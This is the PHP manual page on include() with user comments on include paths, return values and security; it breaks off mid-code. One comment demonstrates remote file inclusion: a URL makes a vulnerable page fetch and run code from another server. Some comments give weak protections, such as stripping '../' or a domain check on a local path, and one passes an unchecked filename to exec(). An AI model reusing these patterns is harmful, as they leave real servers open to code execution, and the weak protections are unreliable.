Well, I'm using "realpath" on each include I make.
http://www.php.net/realpath
this function rewrites relative paths and symbolic links:
<?php
include(realpath('../../../test.php'));
?>
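The include() statement includes and evaluates the specified file.
The documentation below also applies to require(). The two constructs behave identically except in how they handle errors. Both output a Warning when an error occurs, but with require() the result is a Fatal Error. In other words, use require() if you want processing to stop when the specified file is missing. With include(), processing continues even when the file to be included does not exist. Do not forget to set include_path appropriately as well. In versions prior to PHP 4.3.5, processing continued even when an included file contained a parse error; later versions stop processing.
Files to be included are first looked for in include_path relative to the current working directory, and then in include_path relative to the directory of the current script. For example, if include_path is libraries, the current working directory is /www/, you included include/a.php, and that file contains include "b.php", then b.php is first looked for in /www/libraries and then in /www/include/. If the filename begins with ./ or ../, it is looked for only in include_path relative to the current working directory.
When a file is included, the code it contains inherits the variable scope of the line on which include() or require() was executed. All variables available at that line in the calling file are available within the included file. However, all functions and classes defined in the included file have global scope.
Example 16.5. Basic include() example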
vars.php
<?php
$color = 'green';
$fruit = 'apple';
?>
test.php
<?php
echo "A $color $fruit"; // A
include 'vars.php';
echo "A $color $fruit"; // A green apple
?>
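If the include occurs inside a function definition in the calling file, all of the code contained in the included file behaves as though it had been defined inside that function. It therefore inherits the variable scope of that function.
Example 16.6. Including within functions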
<?php
function foo()
{
global $color;
include 'vars.php';
echo "A $color $fruit";
}
/* vars.php inherits the scope of foo(), so *
* $fruit is not available outside of this *
* function. $color is available because it *
* was declared as global. */
foo(); // A green apple
echo "A $color $fruit"; // A green
?>
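When a file is included, parsing drops out of PHP mode and into HTML mode at the beginning of the included file, and returns to PHP mode at the end. For this reason, any code in the included file that must be executed as PHP code has to be enclosed within valid PHP start and end tags.
If "URL fopen wrappers" are enabled (they are enabled in the default configuration), you can specify the file to be included using a URL (via HTTP) instead of a local pathname. If the server named in the URL can interpret the file as PHP code, arguments may be passed in the URL request using HTTP GET. This has nothing to do with including a file and inheriting scope; the script is simply executed on the remote server and its result is included into the local script.
Windows versions of PHP prior to PHP 4.3.0 do not currently support remote file access with this function, even if allow_url_fopen is enabled.
Example 16.7. include() through HTTP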
<?php
/* This example assumes that www.example.com is configured to treat .php files *
* as PHP scripts and .txt files as ordinary files. Also, 'works' here means *
* that the variables $foo and $bar are available within the included *
* file. */
// Won't work: www.example.com does not interpret file.txt as PHP code.
include 'http://www.example.com/file.txt?foo=1&bar=2';
// Won't work: looks for a file named 'file.php?foo=1&bar=2' on the local
// filesystem.
include 'file.php?foo=1&bar=2';
// Works.
include 'http://www.example.com/file.php?foo=1&bar=2';
$foo = 1;
$bar = 2;
include 'file.txt'; // Works.
include 'file.php'; // Works.
?>
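The remote file is executed on the remote server (depending on the file extension and on whether the remote server allows PHP to run), but it must still be a valid PHP script, because it is processed on the local server. If you only want the result of processing on the remote server, readfile() is the better choice. Otherwise, care is needed to confirm that the remote script produces valid, expected code.
See also Remote files, fopen() and file().
Handling returns: Inside an included file it is possible to execute a return() statement in order to terminate processing of that file and return to the calling script. It is also possible to return values from included files. You can take the value of the include call just as you would with a normal function. However, when including a remote file, no value can be obtained unless the output of the remote file has valid PHP start and end tags (the same is true of local files). You can declare the needed variables within those tags, and they become available at the point where the file was included.
Because include() is a special language construct, parentheses are not needed around its argument. Take care when comparing the return value.
Example 16.8. Comparing the return value of include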
<?php
// won't work, evaluated as include(('vars.php') == 'OK'), i.e. include('')
if (include('vars.php') == 'OK') {
echo 'OK';
}
// works
if ((include 'vars.php') == 'OK') {
echo 'OK';
}
?>
Note: In PHP 3, return cannot be used inside a block other than a function block. return() applies to the function, not to the whole file.
Example 16.9. include() and the return() statement
return.php
<?php
$var = 'PHP';
return $var;
?>
noreturn.php
<?php
$var = 'PHP';
?>
testreturns.php
<?php
$foo = include 'return.php';
echo $foo; // prints 'PHP'
$bar = include 'noreturn.php';
echo $bar; // prints 1
?>
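When the include succeeds, $bar has the value 1. Notice the difference between the two examples above. The first uses return() within the included file while the other does not. If the file cannot be included, FALSE is returned and an E_WARNING is issued.
If the included file defines functions, they can be used in the main file regardless of whether they appear before or after return(). If the file is included twice, PHP 5 issues a fatal error because the functions are already defined, whereas PHP 4 does not raise an error for functions defined after return(). It is recommended to use include_once() instead of checking whether the file has already been included and conditionally returning inside the included file.
Another way to "include" the contents of a PHP file into a variable is to capture the output by using the Output Control Functions together with include(). For example:
Example 16.10. Using output buffering to include a PHP file into a string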
<?php
$string = get_include_contents('somefile.php');
function get_include_contents($filename) {
if (is_file($filename)) {
ob_start();
include $filename;
$contents = ob_get_contents();
ob_end_clean();
return $contents;
}
return false;
}
?>
To include files automatically within scripts, see also the auto_prepend_file and auto_append_file options in php.ini.
Note: Because this is a language construct and not a function, it cannot be called using variable functions.
See also require(), require_once(), include_once(), get_included_files(), readfile(), virtual() and include_path.
22-Aug-2007 06:48
17-Aug-2007 01:17
In reference to the fopen() and $use_include_path workaround for checking whether an include file exists as posted by [arnold at bean-it dot nl]...
I did some benchmarks with 100 dirs (each with 1 file) in the include_path on Apache/2.0.55 (Win32) PHP/5.2.1.
Here are the results:
(note: in the success scenarios, I am include'ing the file in the LAST directory on the include stack. This is to maximize the seek time; fail scenarios simply use a non-existent file; all times are in seconds )
benchmarks --> plain vanilla INCLUDE
(success)
0.05515718460083
0.054859161376953
0.053768157958984
(fail)
0.22402501106262
0.17378783226013
0.14510798454285
benchmarks --> fopen() and $use_include_path workaround
(success)
0.060588836669922
0.069549798965454
0.056423902511597
(fail)
0.05295991897583
0.039775133132935
0.054499864578247
>>> CONCLUSION
In cases involving MANY include paths, include() is -marginally- faster than the workaround (unsurprising - we incur the extra overhead of BOTH the fopen() call AND the $use_include_path seek). I say marginal in comparison to the "fail" scenarios, detailed next..
The most surprising thing is the inefficiency of include() when you are trying for a non-existent file. As compared to the workaround, the native include() method is roughly 3 times slower.
Based on additional tests (50 paths only), I note that any decrease in seek time for either case is generally linear to the number of paths.
---
THEREFORE, depending on the amount of paths you have, you might want to resort to different methods of optimizing the includes in your scripts, especially if you need to constantly test for the existence of include'd files (our organization uses a templating engine that relies on a virtual flat directory structure using the set_include_path() function).
---
From a technical perspective, I have no idea why this is the case and I find the prospect of trawling the PHP source to be rather daunting. However, as an educated guess: I figure that the include() code assumes the file exists, and so wastes processor cycles making a system read call, which inevitably fails.
For those interested in the benchmark script, you can email me at the email address provided above. No support, of course. :P
10-Aug-2007 12:09
A small tweak to alex's getFilePath function allows it to work for Windows-based PHP as well:
<?php
$absPath = str_replace("\\", "/", dirname($_SERVER['SCRIPT_FILENAME']));
?>
Windows recognizes a forward slash as a directory separator character.
Using $_SERVER['DOCUMENT_ROOT'] and similar solutions didn't seem to work for web paths with internal symbolic links. Alex's function gets around that and works great.
27-Jul-2007 12:07
Since include() caused me many problems when I was trying to test my code, I wrote a small function. It receives as parameter the path to the file to include relative to the current file. The format is similar to:
"../../path/FileName.php"
The function returns the absolute path to the file to be included. This path can be used as argument to include() and resolves the problem of nested inclusions.
<?php
function getFilePath($relativePath){
$absPath=dirname($_SERVER['SCRIPT_FILENAME']);
$relativeArray=explode("/",$relativePath);
$absArray=explode("/",$absPath);
$upTokens=0;
//count the number of ".." tokens that precede the path
while(( $upTokens<count($relativeArray)) and ($relativeArray[$upTokens]=="..")) {
$upTokens++;
}
// create the absolute path
$filePath=$absArray[0];
for ($i=1; $i< (count($absArray)-$upTokens);$i++) {
$filePath.="/".$absArray[$i];
}
for ($i=$upTokens; $i< count($relativeArray);$i++){
$filePath.="/".$relativeArray[$i];
}
return $filePath;
}
?>
Hope you will find it useful....
Alex
26-Jul-2007 03:22
Easy way to set $_GET values for local includes.
This is an easy way to make up fake URLs for SEO purposes that are really just running other PHP pages with special $_GET values.
This will NOT work:
<?PHP
include('communities.php?show=gated&where=naples');
?>
However, this will:
<?PHP
$_GET = array();
$_GET['show'] = 'gated';
$_GET['where'] = 'naples';
include('communities.php');
?>
Putting this on your page and nothing else will give the same result as going to
'communities.php?show=gated&where=naples'
but the URL can be whatever you want it to be.
20-Jul-2007 08:28
If you use php >5.2, don't forget to set up the allow_url_include parameter in php.ini file .. If not you can search a long long long long time after this like-a-bug problem ;)
http://www.php.net/manual/en/ini.php
18-Jul-2007 06:09
If you want to include a file that has no PHP in it (such as a template), it is more efficient to use file_get_contents().
Instead of:
include "file.htm";
use:
echo file_get_contents("file.htm");
In a rough millisecond test using gettimeofday(), it proved to be about twice as fast.
03-Jul-2007 09:22
In response to oasis1 below, I use mod_rewrite to pipe all my requests through the index.php file, so I'm able to use the below code to find the root directory:
$sRoot = $_SERVER['HTTP_HOST'] . dirname($_SERVER['SCRIPT_NAME']);
You may be able to modify it to suit yourself.
30-Jun-2007 12:11
What a pain! I have struggled with including files from various subdirectories. My server doesn't support an easy way to get to the root HTML directory so this is what I came up with:
<?php
$times = substr_count($_SERVER['PHP_SELF'],"/");
$rootaccess = "";
$i = 1;
while ($i < $times) {
$rootaccess .= "../";
$i++;
}
include ($rootaccess."foo/bar.php");
?>
This will give you what it takes to get to the root directory, regardless of how many subdirectories you have traveled through.
04-Jun-2007 06:07
A very EASY way to get 'include' to find its way to another directory, other than setting the 'include path', and useful for fetching one or two files:
include ($_SERVER['DOCUMENT_ROOT']."/foo/bar.php");
This creates an include that is relative to the root rather than the current directory.
The dot is for concatenation, not current directory, as with 'include path' syntax.
See Appendix M of Manual > Reserved words > Predefined Variables, for more info on $_SERVER.
02-Jun-2007 10:18
This is a good example for returning a value from an included file I think.
I'm working on my own template class like Smarty. This class gets html code from template files. Then it creates a file that will be included directly. It displays only installed modules for the page. The included page always checks the installed modules. If the comparison returns false, the included file returns FALSE and warns the class to recreate itself. Then a new file with requested modules will be overwritten to the existing one.
Here is the main framework of my class:
<?php
/* by Safak Ozpinar */
class MyInclude {
private $modules = array();
private $numModules = 0;
/* the constructor gets module names into an array */
function MyInclude($inputModules) {
if(!is_array($inputModules)) $inputModules = array($inputModules);
foreach($inputModules as $module) {
$this->modules[$this->numModules] = $module;
$this->numModules++;
}
}
/* the main action happens here, check carefully */
function Display($fname, $reCreate = FALSE) {
if(@file_exists($fname) && !$reCreate) {
// if the included file returns FALSE, recreate it
if((include $fname)==FALSE) {
$this->Display($fname, TRUE);
return;
}
}
else {
$this->Create($fname);
include($fname);
}
}
/* the behavior of the method Create depends on the format of your template file */
// you will need some changes on this method to adapt to your work
private function Create($fname) {
$contentsPHP = '<?'."\n";
$contentsHTML = '<html><body>'."\n";
foreach($this->modules as $module) {
$contentsPHP .= '$storedModules[] = \''.$module.'\';'."\n";
// the html code of the module (you may need to take from a template file)
$contentsHTML .= '<p>HTML code for module <b>"'.$module.'"</b></p>'."\n";
}
// here is the comparison code for included file
// if the comparison returns FALSE, the file also returns FALSE
$contentsPHP .= 'if(!$this->Compare($storedModules)) return FALSE;'."\n";
$contentsPHP .= '?>'."\n";
$contentsHTML .= '</body></html>';
$fp = fopen($fname,'wb');
fwrite($fp, $contentsPHP.$contentsHTML);
fclose($fp);
}
/* ordered comparison, you may want to change the operations in this method */
function Compare($storedModules) {
$count = count($storedModules);
if($count == $this->numModules) {
for($i=0; $i<$count; $i++) {
if(strcmp($storedModules[$i],$this->modules[$i])!=0)
return FALSE;
}
return TRUE;
}
else return FALSE;
}
}
/* lets go */
$tpl = new MyInclude(array('headline','main_menu','sub_menu','text_ads'));
$tpl->Display('inc.php');
?>
I haven't written error controls here because the code would be too large. For instance; if a html template for requested modules doesn't exist, you may want to display an error message or make some operations.
---
Safak Ozpinar (from Istanbul University)
21-May-2007 12:38
Regarding the caching of includes.
I submitted a bug for this, apparently it's not a bug it's supposed to work that way for some reason.
The bugs team declined to elaborate as to why but it would seem includes aren't meant to use dynamic code, which makes this function worthless and by extension makes php needlessly time consuming because you can't reuse files properly.
17-May-2007 11:26
I needed to use an include with an echo statement, with http authentication so I thought I'd share. It's basic but I didn't find it documented anywhere:
include 'http://treyh:pass@192.168.0.60/update2_count3.php?data=' . $row['id'];
Even when you set cache control and expiry headers:
header("Expires: 0");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("cache-control: no-store, no-cache, must-revalidate");
header("Pragma: no-cache");
It doesn't seem to reparse the include on the second hit to the page without a forced refresh.
e.g. a page where you direct to a login page which changes a $_SESSION var then returns to the originating page.
The originating page doesn't execute the code so it looks like still not logged in.
01-May-2007 02:03
I wanted that included files behave like in C/C++ and this was killing me. So I created this function that really helped me (Note: You should add these lines to EVERY included file).
Code Lines:
<?
$FILE_PATH = preg_replace_callback(
'/(.*)(\\\?.*?)\s*;\1(\\\?.*?)\s*$/',
create_function(
'$matches',
'$path = str_replace("\\\", "/",(isset($matches[2])?
preg_replace(
\'/(?:^\/|^\\\\\)?[^\/\\\\\]+(?:\/|\\\\\)?/\',
"../",$matches[2]):"./").
(isset($matches[3])?$matches[3]:""));
return !empty($path)? "$path/" : "./";'
)
,realpath("./").";".dirname(__FILE__)
);
?>
Usage Example:
Files hierarchy for example
/www/file.php
/include/secondfile.php
/include/test/anotherfile
<? //file.php
//i will not include the code lines in example to avoid repetition but you have to
// --- FILE_PATH code lines here ---
// include the file relative to the caller position remember to use a relative path from each file to desired file
include ($FILE_PATH . "../../include/secondfile.php");
?>
<? //secondfile.php
// --- FILE_PATH code lines here ---
//note that path used is in reference to secondfile.php's path and not the original caller's(file.php) path
include ($FILE_PATH . "test/anotherfile"); //or include ($FILE_PATH . "./test/anotherfile");
?>
<? //anotherfile
/* --- some mixed content here --- */
?>
Now you can do recursive includes to files inside already included files using each file's path as reference, like in c/c++!!!
I'd tested this just in WINXP (PHP Version 4.4.1), so, I don't know how it behaves in other OS/PHP-Versions. Any additional suggestions or bugs, please let me know.
10-Mar-2007 12:36
In response to baofu:
The problem with calling:
set_include_path( ... )
before including any file, is that if one of the included files, in turn, does a set_include_path to include yet another bunch of files, then the following include statement in your topmost file, is done in an include path context that has changed.
Using: include dirname(__FILE__).'/../foo/bar' remains the best solution.
24-Feb-2007 04:43
This might help a bit for security (no guarantees).
Instead of
include $page;
put
include str_replace('../', '', './' . $page);
23-Feb-2007 08:47
coldflame,
<?=$foo?> equals <? print $foo ?>
If 1 is not needed at the end, just use <? include($filename) ?> without the equal sign.
13-Feb-2007 10:49
Be careful using the <?= / ?> start and end tags with include / require.
A lovely feature/bug/misunderstanding meant that the result of
<?=include(filename)?>
was to get the contents of the file, suffixed with a '1'. I can only assume that the one is the return code of the include.
hopefully my pain can help somebody else :D
cheers,
coldflame
11-Feb-2007 02:23
If you have a problem with "Permission denied" errors (or other permissions problems) when including files, check:
1) That the file you are trying to include has the appropriate "r" (read) permission set, and
2) That all the directories that are ancestors of the included file, but not of the script including the file, have the appropriate "x" (execute/search) permission set.
03-Feb-2007 12:22
you can also use the following before you include any files.
set_include_path(dirname(__FILE__))
20-Jan-2007 07:32
You can also use debug_backtrace to write a function that does the chdir automatically:
<?php
function include_relative($file)
{
$bt = debug_backtrace();
$old = getcwd();
chdir(dirname($bt[0]['file']));
include($file);
chdir($old);
}
?>
19-Jan-2007 06:49
When I'm dealing with a package that uses relative includes of its own, rather than modify all of their includes, I found it was easier to change PHP's working directory before and after the include, like so:
<?
$wd_was = getcwd();
chdir("/path/to/included/app");
include("mainfile.php");
chdir($wd_was);
?>
This way neither my includes nor theirs are affected; they all work as expected.
19-Jan-2007 01:06
In reply to the last anonymous note, this is exactly the way mediawiki code handles this problem. They have various-depth include paths.
So, for instance, inside includes/normal/UtfNormal.php (as of revision 19455) they do:
<?php
require_once dirname(__FILE__).'/UtfNormalUtil.php';
?>
...to include the file includes/normal/UtfNormal.php.
10-Jan-2007 08:12
If you want the "include" function to work correctly with paths and GET parameters, try the following code:
<?php
$_GET['param1'] = 'param1value';
$_GET['param2'] = 'param2value';
@include($_SERVER['DOCUMENT_ROOT'] . "/path1/path2/include.php");
?>
Then within your "include.php" use $_GET['param1'] and $_GET['param2'] to access values of parameters.
I spent several hours to figure this out.
01-Jan-2007 11:42
I'm gonna throw my hat in the ring and also say that I've always thought that the include path being relative to the current directory is silly. PHP is the only language I can think of that does this. Almost all of my include paths have always had to be prefixed with <?php dirname(__FILE__) ?> to operate expectedly.
29-Dec-2006 04:27
I have to agree with sean dot farrell at digital-egg dot org.
If I put "../" or "./" in a call to include(), I expect it to be relative to the file I am including from, not the current working directory of the application.
This backwards mentality for relative paths really interferes with PHP's ability to build packages of files independent of an application.
29-Nov-2006 11:12
The way PHP handles the ./ and ../ is totally counterintuitive. As said, if the included file is preceded by a ./ and ../ it is looked up from the current working directory. And that is defined by the of the EXECUTED script. That is the script that you specified in the url.
So if you have a.php that includes include/b.php that includes ../extern/c.php, it will not do what you want. You can use extern/c.php instead if you never execute outside of the document root. For me that just will not cut it. Since I execute test suites if files are directly called, like in python.
Here is my dirty trick that works, since I only have two levels of file hierarchy:
set_include_path("../:./");
require_once("extern/c.php");
And here is an open question: Why are the included files not looked up relative from the file that includes them and then in the include path? This would be a behavior like in all other languages.
17-Nov-2006 06:03
In response to http://uk.php.net/manual/en/function.include.php#38000
Using the following at the top of your CLI scripts will make includes work similar to web PHP.
#!/usr/bin/php
<?php chdir(dirname(__FILE__)); ?>
This changes the current working directory to the one your script is running in. It's quite used for taking existing web scripts and getting them to run quickly in the command line.
17-Nov-2006 12:59
Please note that although you can call a function that is DEFINED later in the code, you cannot call a function that is defined in a file which is INCLUDED later. Consider following two examples:
Example 1:
<?php
test();
function test()
{
echo 'In test.';
}
?>
Example 2:
file1.php:
<?
test();
include 'file2.php';
?>
file2.php:
<?
function test()
{
echo 'In test.';
}
?>
Please be aware that while the first example will work as expected, the second one will generate a fatal error "Call to undefined function: test() ...". The same is true for the require.
14-Aug-2006 09:28
Trick to get around including get method...
Since this doesn't work:
include('page.php?id=1');
Try this:
$_REQUEST['id'] = 1;
include('page.php');
09-Aug-2006 12:33
If a person directly accesses an include file by mistake, you may want to forward them to a correct default page.
Do this by:
Say the file to be included is 'newpubs.php'
and the main pages are either newpubs_e.php or newpubs_f.php
if($_SERVER['PHP_SELF']=="/newpubs.php")
{
header("Location: newpubs_e.php");
exit;
}
Will send them to newpubs_e.php if they try to access newpubs.php directly.
27-May-2006 08:50
Because there is no quick way to check if a file is in include_path, I've made this function:
<?php
function is_includeable($filename, $returnpaths = false) {
$include_paths = explode(PATH_SEPARATOR, ini_get('include_path'));
foreach ($include_paths as $path) {
$include = $path.DIRECTORY_SEPARATOR.$filename;
if (is_file($include) && is_readable($include)) {
if ($returnpaths == true) {
$includeable_paths[] = $path;
} else {
return true;
}
}
}
return (isset($includeable_paths) && $returnpaths == true) ? $includeable_paths : false;
}
?>
20-May-2006 06:40
at spam guard dot gmail com
to php dot net at reinsveien dot com:
if you know the domain the file should be coming from then you can parse the variable for the domain and make sure that it matches the domain you expect, example:
<?php
$path="/full/path/to/script/";
if (getdomain($path) == 'yourdomain'){
include($path.'somefile.php');
}
?>
this should prevent remote execution of any malicious script
09-May-2006 04:15
What cavarlier refers to is that on some editors, UTF-8 files are prefixed with a BOM (Byte Order Mark), an invisible marker three bytes in size, which are output by PHP if it encounters them (which is before the <?php on the first line). Notepad is particularly notorious for creating these.
However, any decent editor (e.g. Notepad2) can save UTF-8 files without BOM, and if you do that the first <?php tag will truly be on the first character of the file.
So this does not mean that UTF-8 cannot be used by PHP.
23-Apr-2006 04:59
Please note when you include a (UTF-8) encoded file, this will be sufficient to send headers even if it doesn't contain any line breaks.
25-Feb-2006 07:15
Currently there is no clean way to check if a file can be included. Simply including a file which can't be opened causes a warning to be triggered. Suppressing include() with an @ (as often seen below) is not advisable, since parse errors won't be displayed, but will cause the script to die, causing a blank screen. (Happy debugging, hope you're using ZendStudio or some other debugger).
The best solution I've come up with is:
<?php
if (($fp = @fopen($filename, 'r', 1)) and fclose($fp)) include $filename;
?>
I believe the functions file_exists(), filesize(), is_readable() and is_writable() should have an use_include_path just like fopen().
If you agree with this, please PLEASE VOTE on bug #6932 (http://bugs.php.net/bug.php?id=6932). This bug has been open for over 5 years. Apparently no one is willing to add this feature.
19-Jan-2006 09:36
@ajsharp at gmail dot com
To find out which script has included another, use the Server Variable 'SCRIPT_NAME' (note: there are other server variables that also contain the script name, but I use this one simply because it works for me) e.g.
"variables.php"
<?php
$includer = basename($_SERVER['SCRIPT_NAME']);
switch ($includer) {
case 'a.php':
$this_variable = 'included by script a.php';
break;
case 'b.php':
$this_variable = 'included by script b.php';
break;
default:
$this_variable = 'included by unkown script';
}
echo $this_variable;
?>
Test with 3 different files "a.php", "b.php", "c.php", all with the same content:
<?php
include 'variables.php';
?>
10-Jan-2006 09:55
a simple function to recursively include e.g. the include-directory of your site and its subdirs:
<?php
function includeRecurse($dirName) {
if(!is_dir($dirName))
return false;
$dirHandle = opendir($dirName);
while(false !== ($incFile = readdir($dirHandle))) {
if($incFile != "."
&& $incFile != "..") {
if(is_file("$dirName/$incFile"))
include_once("$dirName/$incFile");
elseif(is_dir("$dirName/$incFile"))
includeRecurse("$dirName/$incFile");
}
}
closedir($dirHandle);
}
?>
04-Oct-2005 04:31
The documentation should make it clearer that the include argument is not a site path (i.e. not relative to the document root or to any web server defined aliases), but rather a path on the host relative to the calling script's directory.
25-Aug-2005 06:21
I had been looking around on how to make sure that a file is included, I guess the way to do it changed with new version, here we go:
<?php
if ((include "header.php") == true) {
echo ("header loaded");
}//end if
else{
echo("header not loaded");
}//end else
?>
hope that helps!
15-Aug-2005 12:14
If you want to prevent direct access to some files and only allow them to be used as include files by other scripts, then an easy way to accomplish that is to check a define in the include file.
Like this.
includefile.php
---
<?php
defined('_VALID_INCLUDE') or die('Direct access not allowed.');
/* rest of file */
?>
script.php
---
<?php
define('_VALID_INCLUDE', TRUE);
include('includefile.php');
/* rest of file */
?>
20-Jul-2005 06:10
Hi, there...
I've used this in order to grab the output from an include() but without sending it to the buffer.
Headers are not sent either.
<?php
function include2($file){
$buffer = ob_get_contents();
include $file;
$output = substr(ob_get_contents(),strlen($buffer));
ob_end_clean();
ob_start();
echo $buffer;
return $output;
}
?>
19-Jul-2005 04:04
Another way of getting the proper include path relative to the current file, rather than the working directory is:
<?php
include realpath(dirname(__FILE__) . "/" . "relative_path");
?>
04-Jul-2005 10:07
When working with a well organized project you may come across multiple problems when including, if your files are properly stored in some nice folders structure such as:
- src
- web
- bo
- lib
- test
- whatever
as the include path's behaviour is somehow strange.
The workaround I use is having a file (ex: SiteCfg.class.php) where you set all the include paths for your project such as:
$BASE_PATH = dirname(__FILE__);
$DEPENDS_PATH = ".;".$BASE_PATH;
$DEPENDS_PATH .= ";".$BASE_PATH."/lib";
$DEPENDS_PATH .= ";".$BASE_PATH."/test";
ini_set("include_path", ini_get("include_path").";".$DEPENDS_PATH);
Make all paths in this file relative to ITS path. Later on you can import any file within those folders from wherever with include/_once, require/_once without worrying about their path.
Just cross fingers you have permissions to change the server's include path.
Though you can figure it out by reading the doc, this hint might save you some time. If you override include_path, be sure to include the current directory ( . ) in the path list, otherwise include("includes/a.php") will not search in the current script directory.
e.g :
if(file_exists("includes/a.php"))
include("includes/a.php");
The first line will test to true, however include will not find the file, and you'll get a "failed to open stream" error
03-May-2005 09:20
As stated above, when using return() to terminate execution of an included file, any functions defined in the file will still be defined in the global scope, even if the return() occurs before their definition.
It should be noted that class definitions behave in the same way.
28-Apr-2005 09:31
Something not previously stated here - but found elsewhere - is that if a file is included using a URL and it has a '.php' extension - the file is parsed by php - not just included as it would be if it were linked to locally.
This means the functions and (more importantly) classes included will NOT work.
for example:
include "http://MyServer.com/MyInclude.php";
would not give you access to any classes or functions within the MyInclude.php file.
to get access to the functions or classes you need to include the file with a different extension - such as '.inc' This way the php interpreter will not 'get in the way' and the text will be included normally.
14-Apr-2005 06:47
This is not directly linked to the include function itself. But I had a problem with dynamically generated include-files that could generate parse errors and cause the whole script to parse-error.
So as I could not find any ready solution for this problem I wrote the mini-function. It's not the most handsome solution, but it works for me.
<?php
function ChkInc($file){
if(substr(exec("php -l $file"), 0, 28) == "No syntax errors detected in"){
return true;
}else{
return false;
}
}
?>
if someone else has a better solution, do post it...
Note. remember that this function uses unchecked variables passed to exec, so don't use it for direct user input without improving it.
//Gillis Danielsen
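A hardened form of the lint check above, added here as an example and not the note author's code: the filename is resolved and shell-quoted before it reaches exec(), and the verdict comes from the exit status of php -l. The name lint_include() is hypothetical, and a php CLI binary on PATH is assumed, as in the note.

```php
<?php
/**
 * Added example (not the note author's code): the same "php -l" lint
 * check with the filename treated as data rather than shell syntax.
 * lint_include() is a hypothetical name; a "php" CLI binary on PATH
 * is assumed, as in the note above.
 */
function lint_include($file, &$message = null)
{
    // Resolve first: this rejects missing files and yields an absolute
    // path, which cannot be mistaken for a command-line option.
    $real = realpath($file);
    if ($real === false || !is_file($real)) {
        $message = 'not a regular file';
        return false;
    }

    // escapeshellarg() quotes the path so that spaces, semicolons or
    // backticks in a generated filename stay inside one argument.
    $cmd = 'php -l ' . escapeshellarg($real) . ' 2>&1';
    $output = array();
    $status = 1;
    exec($cmd, $output, $status);

    // Decide on the exit status (0 = no syntax errors) instead of
    // matching a prefix of the message text.
    $message = implode("\n", $output);
    return $status === 0;
}

// --- Constructed demo files (names contain spaces on purpose) ---
$dir  = sys_get_temp_dir();
$good = $dir . DIRECTORY_SEPARATOR . 'lint demo good.php';
$bad  = $dir . DIRECTORY_SEPARATOR . 'lint demo bad.php';
file_put_contents($good, '<?php echo "ok";');
file_put_contents($bad, '<?php echo "unterminated;');

foreach (array($good, $bad, $dir . '/does-not-exist.php') as $f) {
    $ok = lint_include($f, $msg);
    echo basename($f), ': ', $ok ? 'parses cleanly' : "refused ($msg)", "\n";
}

unlink($good);
unlink($bad);
```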
10-Dec-2004 09:30
The __FILE__ macro will give the full path and name of an included script when called from inside the script. E.g.
<? include("/different/root/script.php"); ?>
And this file contains:
<? echo __FILE__; ?>
The output is:
/different/root/script.php
Surprisingly useful :> Obviously something like dirname(__FILE__) works just fine.
11-Aug-2004 09:47
To avoid painfully SLOW INCLUDES under IIS be sure to set "output_buffering = on" in php.ini. File includes dropped from about 2 seconds to 0 seconds when this was set.
03-Jun-2004 08:09
I would like to emphasize the danger of remote includes. For example:
Suppose, we have a server A with Linux and PHP 4.3.0 or greater installed which has the file index.php with the following code:
<?php
// File: index.php
include ($_GET['id'].".php");
?>
This is, of course, not a very good way to program, but I actually found a program doing this.
Then, we have a server B, also Linux with PHP installed, that has the file list.php with the following code:
<?php
// File: list.php
$output = "";
exec("ls -al",$output);
foreach($output as $line) {
echo $line . "<br>\n";
}
?>
If index.php on Server A is called like this: http://server_a/index.php?id=http://server_b/list
then Server B will execute list.php and Server A will include the output of Server B, a list of files.
But here's the trick: if Server B doesn't have PHP installed, it returns the file list.php to Server A, and Server A executes that file. Now we have a file listing of Server A!
I tried this on three different servers, and it always worked.
This is only an example, but there have been hacks uploading files to servers etc.
So, always be extremely careful with remote includes.
13-Apr-2004 01:27
In addition to the redeye at cs-aktuell dot de note:
To make a pseudo-frame in total security,
example: http://www.yourdomain.com/index.php?page=news
<?php
/* verify the validity of GET var page
   if not set, do a default case */
if(isset($_GET['page']))
{
    $p = $_GET['page'];
}
else
{
    $p = 'index';
}
switch($p)
{
    case 'index':
        require('welcome.php');
        break;
    case 'news':
        require('news.php');
        break;
    case 'what you want':
        require('the file you want');
        break;
    default:
        exit('Wrong parameter for file inclusion');
}
?>
marco_
16-Jan-2004 12:03
<?php
@include('/foo') OR die ("bar"); # <- Won't work
@(include('/foo')) OR die ("bar"); # <- Works
?>
So "or" has priority over "include".
10-Dec-2003 03:03
While you can return a value from an included file, and receive the value as you would expect, you do not seem to be able to return a reference in any way (except in an array; references are always preserved in arrays).
For example, we have two files, file 1.php contains...
<?php
function &x(&$y)
{
    return include(dirname(__FILE__) . '/2.php');
}
$z = "FOO\n";
$z2 = &x($z);
echo $z2;
$z = "NOO\n";
echo $z2;
?>
and file 2.php contains...
<?php return $y; ?>
calling 1.php will produce
FOO
FOO
i.e. the reference passed to x() is broken on its way out of the include()
Neither can you do something like <?php $foo =& include(....); ?> as that's a parse error (include is not a real function, so can't take a reference in that case). And you also can't do <?php return &$foo ?> in the included file (parse error again, nothing to assign the reference to).
The only solutions are to set a variable with the reference which the including code can then return itself, or return an array with the reference inside.
---
James Sleeman
http://www.gogo.co.nz/
04-Dec-2003 06:13
I just discovered a "gotcha" for the behavior of include when using the command line version of php.
I copied all the included files needed for a new version of a program into a temporary directory, so I could run them "off to the side" before they were ready for release into the live area. One of the files with a new version (call it common.inc.php for this example) normally lives in one of the directories in the include path. But I did not want to put the new version there yet! So I copied common.inc.php into my temporary directory along with the others, figuring that the interpreter would find it there before it found it in the include directory, because my include path has a . at the beginning. When I tested it, everything was fine.
But then I set up a cron job to run the script automatically every day. In the crontab I placed the full path of the script. But when it ran, it included the old version of my common.inc.php file out of the include directory. Interestingly, the other include files that only existed in the temporary directory were included fine.
Evidently AFTER the include path is searched, the directory in which the main script lives is searched as well. So my temporary installation almost worked fine, except that the lack of the small change I had made in the common file introduced a bug.
To make it work I use a shell script to start my php script. It contains a cd command into the temporary directory, then starts the php script.
So "current directory" (the . in the include path) for a command line script is really the current directory you are in when executing the script. Whereas it means the directory in which the script lives when executing under Apache.
I hope this helps save someone else the hours it took me to figure out my problem!
David
19-Nov-2003 11:07
The @ directive works with this construct as well. My experience is you can use an if-statement to verify if the script was included (I haven't tested this on remote includes, there might be non-standard-404 pages that make it impossible to verify you got the right page)
Example:
<?php
// ignore the notice and evaluate the return value of the script, if any.
if(@include(dirname(__FILE__)."/foo.php"))
    echo "foo.php included";
else
    echo "failed to include foo.php";
?>
08-Feb-2003 10:29
As to the security risks of an include statement like:
<?php
include($page);
?>
This is a really bad way of writing an include statement because the user could include server- or password-files which PHP can read as well. You could check the $page variable first but a simple check like
<?php
